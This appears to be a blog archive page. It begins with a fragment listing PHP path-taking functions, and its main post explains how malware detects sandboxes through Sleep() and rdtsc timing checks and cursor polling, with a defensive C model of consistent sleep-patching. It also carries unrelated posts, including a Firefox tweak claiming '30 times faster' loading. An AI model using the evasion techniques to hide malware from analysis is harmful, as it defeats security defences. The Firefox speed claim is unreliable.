tempnam
touch
unlink
imagepng   - 2nd parameter is a path.
imagewbmp  - 2nd parameter is a path.
image2wbmp - 2nd parameter is a path.
imagejpeg  - 2nd parameter is a path.
imagexbm   - 2nd parameter is a path.
imagegif   - 2nd parameter is a path.
imagegd    - 2nd parameter is a path.
imagegd2   - 2nd parameter is a path.
iptcembed
ftp_get
ftp_nb_get

Bypass Dynamic Analysis



Dynamic malware analysis - or sandboxing - has become a central piece of every major security solution... and so has the presence of evasive code in malicious software. Practically all variants of current threats include some sort of sandbox-detection logic.
One very simple form of evasive code is to delay execution of any suspicious functionality for a certain amount of time - the basic idea is to leverage the fact that dynamic analysis systems monitor execution for a limited amount of time, and in the absence of malicious behavior classify a program as benign. On a victim machine, on the other hand, delaying behavior for a few minutes does not have a real impact, allowing the attacker to easily achieve different behavior in the analysis environment and on a real target machine.
The easiest, and definitely most prevalent method of stalling behavior is to make a program “sleep” for a certain amount of time. Since this is such a common behavior, most analysis sandboxes are able to detect this kind of evasion, and in most cases, simply “skip” the sleep. While this sounds like a simple solution, it can have a wide range of unintended effects as we will see in this blog post.

The Power of Procrastination

In our whitepaper Automated Detection and Mitigation of Execution-Stalling Malicious Code we describe the basic principle behind stalling code used against sandboxes:
Stalling code is typically executed before any malicious behavior. The attacker’s aim is to delay the execution of the malicious activity long enough so that an automated dynamic analysis system fails to extract the interesting malicious behavior.
Code stalling can be achieved in a number of ways: waiting for a specific action of the user, wasting CPU cycles computing useless data, or simply delaying execution using a call to the Sleep() function.
According to MSDN:
VOID WINAPI Sleep(_In_ DWORD dwMilliseconds);
Suspends the execution of the current thread until the time-out interval elapses.
So a call to Sleep() will delay the execution of the current thread by the time passed as argument. Most sandboxes monitor the system- or API-calls of a program under analysis and will therefore see this evasion attempt. The sandbox is thus able to detect, and in most cases even react to, this behavior: either by patching the delay argument passed to the operating system, by replacing the called function with a custom implementation, or simply by returning immediately to the calling code (skipping the sleep altogether).

Detecting Sleep Patching

Recently, we have come across an interesting malware family that uses this anti-evasion trick of sandboxes to detect the presence of the analysis environment (one could call it an anti-evasion-evasion trick…).
This malware detects sleep-patching using the rdtsc instruction in combination with Sleep() to check whether execution was accelerated, as one can see in the following code extract:
[Image: Detecting Sleep Patching Anti Evasive Malware Sandbox]
In summary, this code:
  • executes rdtsc, which reads the CPU’s timestamp counter, and stores the timestamp in a temporary value,
  • invokes Sleep() to delay execution,
  • re-executes rdtsc, and
  • compares the two timestamps.

Sleep Patching Using High-Resolution Dynamic Analysis

Unlike traditional sandboxes, Lastline’s high-resolution analysis engine monitors more than just the interaction of programs with the operating system (or API functions). Our engine sees - and can thus influence - every instruction that is executed by the malicious program, not just API function invocations. Since we can also manipulate the values returned by the rdtsc instruction, we can maintain a consistent execution state even when patching a sleep, for example by fast-forwarding the timestamps returned by the CPU to the program each time a sleep is skipped or accelerated.
As a result, the program can no longer distinguish whether a sleep was truly executed in full or the analysis system simply forwarded the time inside the sandbox.

Side-Effects of Sleep Patching: User Emulation

We found other interesting side-effects introduced by sleep patching that might not be directly related to deliberate sandbox detection, as can be seen in the following piece of code:
[Image: Sleep Patching Side Effect User Emulation Evasive Malware]
Here, the malware sample checks for user activity by repeatedly reading the cursor position (at 30-second intervals).
Most sandboxes have some mechanism to trigger (or simulate) user activity. Typically this means repeatedly changing the cursor position, opening new windows, clicking on dialog boxes, and so on.
In the code above, the malware sample uses Sleep() not to delay malicious activity, but merely as a simple way of checking that some user activity (mouse movement, in this case) was observed within a certain time period. Clearly, if a sandbox naively accelerates this code by patching the sleeps, the activity that was expected to happen while the malware sample is dormant will not happen, and as a consequence the presence of the analysis environment will be detected, evading analysis.
Therefore, again, a naive approach to execution-stalling allows an attacker to identify the presence of the sandbox, or, as in this case, the absence of a real user, evading analysis.
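To make the two design points above concrete (the rdtsc-based check from the first code extract, and the need to fast-forward both the CPU timestamps and the emulated user activity when a sleep is skipped), here is a small virtual-clock model of a sandbox's Sleep() hook. It is an added example, not Lastline's code: the `struct sandbox`, the 2 GHz virtual TSC rate, the 45-second scheduled cursor move and the polling intervals are all constructed for illustration, and `patched_sleep()` stands in for whatever a real sandbox does when it intercepts Sleep().

```c
/* Added example (not Lastline's code): a virtual-clock model of a sandbox's Sleep()
 * hook, showing why skipping a sleep must also move everything that depends on time.
 * Constructed assumptions: a 2 GHz virtual TSC, one emulated mouse move scheduled
 * 45 s into the analysis, and a sample that checks exactly what the post describes. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define VCPU_HZ     2000000000ULL   /* constructed: rate of the virtual timestamp counter */
#define MAX_EVENTS  8
#define DELIVERED   UINT64_MAX      /* marks an event that has already fired */

enum patch_mode { PATCH_NAIVE = 0, PATCH_CONSISTENT = 1 };

/* Everything the sample can observe that is a function of time. */
struct sandbox {
    enum patch_mode mode;
    uint64_t tsc;       /* value the sample reads via rdtsc */
    uint64_t now_ms;    /* virtual wall clock */
    int cursor_x;       /* emulated cursor, as returned by a GetCursorPos-style call */
    struct { uint64_t due_ms; int x; } events[MAX_EVENTS]; /* queued user emulation */
    int n_events;
};

static void sandbox_init(struct sandbox *sb, enum patch_mode mode) {
    memset(sb, 0, sizeof *sb);
    sb->mode = mode;
    sb->tsc = 123456789ULL;   /* arbitrary constructed start value */
}

/* User-emulation plan: at virtual time due_ms, move the cursor to x. */
static void sandbox_schedule_cursor_move(struct sandbox *sb, uint64_t due_ms, int x) {
    if (sb->n_events < MAX_EVENTS) {
        sb->events[sb->n_events].due_ms = due_ms;
        sb->events[sb->n_events].x = x;
        sb->n_events++;
    }
}

/* Fire every queued event whose due time has been reached (in schedule order). */
static void sandbox_deliver_due_events(struct sandbox *sb) {
    for (int i = 0; i < sb->n_events; i++) {
        if (sb->events[i].due_ms != DELIVERED && sb->events[i].due_ms <= sb->now_ms) {
            sb->cursor_x = sb->events[i].x;
            sb->events[i].due_ms = DELIVERED;
        }
    }
}

/* What the sandbox does when the sample calls Sleep(ms). Neither mode really waits. */
static void patched_sleep(struct sandbox *sb, uint32_t ms) {
    if (sb->mode == PATCH_NAIVE)
        return;  /* return at once; TSC, wall clock and user emulation stay frozen */
    /* Consistent mode: account for the whole interval, then deliver whatever the
     * emulated user would have done during it, before control goes back. */
    sb->now_ms += ms;
    sb->tsc += (uint64_t)ms * (VCPU_HZ / 1000);
    sandbox_deliver_due_events(sb);
}

/* Sample-side check from the post: rdtsc, Sleep, rdtsc, compare. Returns 1 if the
 * elapsed cycles are at least what a real sleep of `ms` would have consumed. */
static int sleep_looks_real(struct sandbox *sb, uint32_t ms) {
    uint64_t t0 = sb->tsc;
    patched_sleep(sb, ms);
    uint64_t t1 = sb->tsc;
    return (t1 - t0) >= (uint64_t)ms * (VCPU_HZ / 1000);
}

/* Sample-side check from the second extract: poll the cursor `polls` times, sleeping
 * `interval_ms` between polls. Returns 1 if the cursor moved at all. */
static int user_activity_seen(struct sandbox *sb, int polls, uint32_t interval_ms) {
    int start_x = sb->cursor_x;
    for (int i = 0; i < polls; i++) {
        patched_sleep(sb, interval_ms);
        if (sb->cursor_x != start_x)
            return 1;
    }
    return 0;
}

/* Run both checks against a fresh sandbox in the given mode.
 * Bit 0: the 1 s sleep looked real; bit 1: user activity was observed. */
static int run_scenario(enum patch_mode mode) {
    struct sandbox sb;
    sandbox_init(&sb, mode);
    sandbox_schedule_cursor_move(&sb, 45000, 300);   /* emulated mouse move at t = 45 s */
    int result = 0;
    if (sleep_looks_real(&sb, 1000))        result |= 1;
    if (user_activity_seen(&sb, 4, 30000))  result |= 2;
    return result;
}

int main(void) {
    printf("naive patch:      %d\n", run_scenario(PATCH_NAIVE));       /* prints 0 */
    printf("consistent patch: %d\n", run_scenario(PATCH_CONSISTENT));  /* prints 3 */
    return 0;
}
```

With the naive patch the sample sees a zero TSC delta across the sleep and never observes the cursor move that the sandbox's own user emulation had planned for 45 seconds in, so both checks fail and the sample learns it is being analysed. With the consistent patch the virtual TSC advances by exactly the skipped interval and the due cursor move is delivered before control returns, so both checks pass without any real time elapsing. The point generalises: any state a sample can read that is a function of time (tick counts, file timestamps, scheduled emulation events) has to be advanced together with the skipped sleep.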

Side-Effects of Sleep Patching: Race Conditions

Another interesting problem related to sleep-patching is race conditions: a race condition is a non-trivial programming error in which multi-threaded code only works correctly if its parts execute in a specific order.
One (ugly, as many programmers would agree) way of avoiding race conditions is to delay code that depends on the completion of another task by the amount of time that task typically needs.
In the presence of sleep-patching, however, this approach is bound to fail, as the sandbox influences the amount of time that is slept. One such example can be seen in the code below, extracted from another malware family:
[Image: Sleep Patching Side Effect Race Conditions Evasive Malware]
In this code, the malware decrypts and executes code from a dropped file, cleaning up after the program has executed (by deleting the file). Between invoking and deleting the program, the malware sample uses (as one might have guessed) a sleep to make sure the program is started before it is deleted. Once again, by patching the sleep incorrectly, the sandbox breaks this logic, causing the malware to delete the payload before it is ever executed.
A more complex example can be seen below:
[Image: sleep-patching-detection-infinite-sleep-evasive-malware]
Here, the malware reads encrypted code from a file on disk and executes it in the context of the current process using a separate thread. Once the payload has been started, the main thread goes into an infinite sleep (but this could equally be a long sleep) before executing ExitProcess (which terminates the execution of all threads in the process).
If this sleep is patched to be shorter than the execution of the malicious payload, the process is terminated before completing its activity, unintentionally stopping the process before it can completely reveal its malicious behavior.

Summary

Timing attacks are common to most malware families today. While some of these timing attacks are easy to detect, naive approaches to overcoming these evasion attempts often cause more harm than good, opening the door to evasion attacks that target the anti-evasion logic itself.
Using high-resolution dynamic analysis and leveraging its insight into each instruction that is executed by the malicious program, the Lastline sandbox is able to foil these attacks and reveal the malicious behavior.

Saturday, November 15, 2014

Make Mozilla Firefox 30 Times Faster

How to make Mozilla Firefox 30 times faster


1. Type “about:config” into the address bar and hit return. Scroll down and look for the following entries:
  • network.http.pipelining
  • network.http.proxy.pipelining
  • network.http.pipelining.maxrequests
Normally the browser will make one request to a web page at a time. When you enable pipelining it will make several at once, which really speeds up page loading.

2. Alter the entries as follows:
  • Set “network.http.pipelining” to “true”
  • Set “network.http.proxy.pipelining” to “true”
  • Set “network.http.pipelining.maxrequests” to some number like 30. This means it will make 30 requests at once.
3. Lastly, right-click anywhere and select New -> Integer.
  • Name it “nglayout.initialpaint.delay” and set its value to “0”.
  • This value is the amount of time the browser waits before it acts on information it receives.
  • If you’re using a broadband connection you’ll load pages 2-30 times faster now.

Wednesday, November 12, 2014

World's fastest charging battery

While our electronic gadgets are evolving by the day, a common bottleneck is outdated battery technology. Luckily, quite a few research efforts look promising for future battery technology - be it COTA wireless charging, the superfast NanoDot smartphone charger (recharges in 30 seconds) or the all-new ultra-fast charging batteries that last 20 years from scientists at Nanyang Technological University (NTU).
The new lithium-ion batteries can reach a 70% charge in two minutes and last for over 20 years. The change that did the trick was using titanium dioxide nanotubes for the anode (the negative pole) instead of conventional graphite, which speeds up the battery's chemical reactions while offering 10,000 charging cycles instead of the usual 500. Since the mini titanium tubes are both easy to make and relatively inexpensive, the technology should not be far from consumer use.

This technology would have a wide-ranging impact on all industries: users would no longer need to replace batteries that can't hold a charge. This is especially useful for electric vehicles, where consumers are put off by long recharge times and limited battery life, which add up to massive ownership costs for such eco-friendly electric-automobile technology.

Fast Charger Technology

New Google Nexus Family With Android 5.0 Lollipop Announced

Google has officially unveiled Android 5.0 Lollipop with a new range of Nexus family devices. The newly announced devices are a 6-inch smartphone named the Nexus 6, a media streamer called the Nexus Player, and an 8.9-inch tablet built by HTC, the Nexus 9 - all powered by the next Google Android OS, Android 5.0 Lollipop.

[Image: Google New Nexus Family With Android 5.0]
First, with Motorola, we developed the Nexus 6. This new phone has a contoured aluminum frame, a 6-inch Quad HD display and a 13 megapixel camera. The large screen is complemented by dual front-facing stereo speakers that deliver high-fidelity sound, making it as great for movies and gaming as it is for doing work. It also comes with a Turbo Charger, so you can get up to six hours of use with only 15 minutes of charge.